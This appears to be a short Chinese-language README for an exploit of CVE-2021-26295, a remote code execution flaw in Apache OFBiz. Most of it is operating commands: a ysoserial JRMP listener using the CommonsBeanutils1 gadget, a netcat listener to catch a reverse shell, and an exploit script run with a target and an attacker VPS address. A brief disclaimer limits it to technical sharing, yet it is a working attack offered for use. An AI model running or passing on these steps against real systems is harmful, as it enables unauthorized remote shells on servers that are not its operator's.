
针对 CVE-2021-26295(Apache OFBiz RCE)的漏洞利用,使用 ysoserial JRMP 监听器在易受攻击的目标上执行命令并获得反向 shell。
CVE-2021-26295 EXP 可成功反弹Shell
本文以及工具仅限技术分享,严禁用于非法用途,否则产生的一切后果自行承担。
RMI监听 9999 端口java -cp ysoserial.jar ysoserial.exploit.JRMPListener 9999 CommonsBeanutils1 '[要执行的命令]'
nc监听 64444 端口nc -lvp 64444
python3 cve-2021-26295_exp.py <target> <vps_ip> <vps_port>

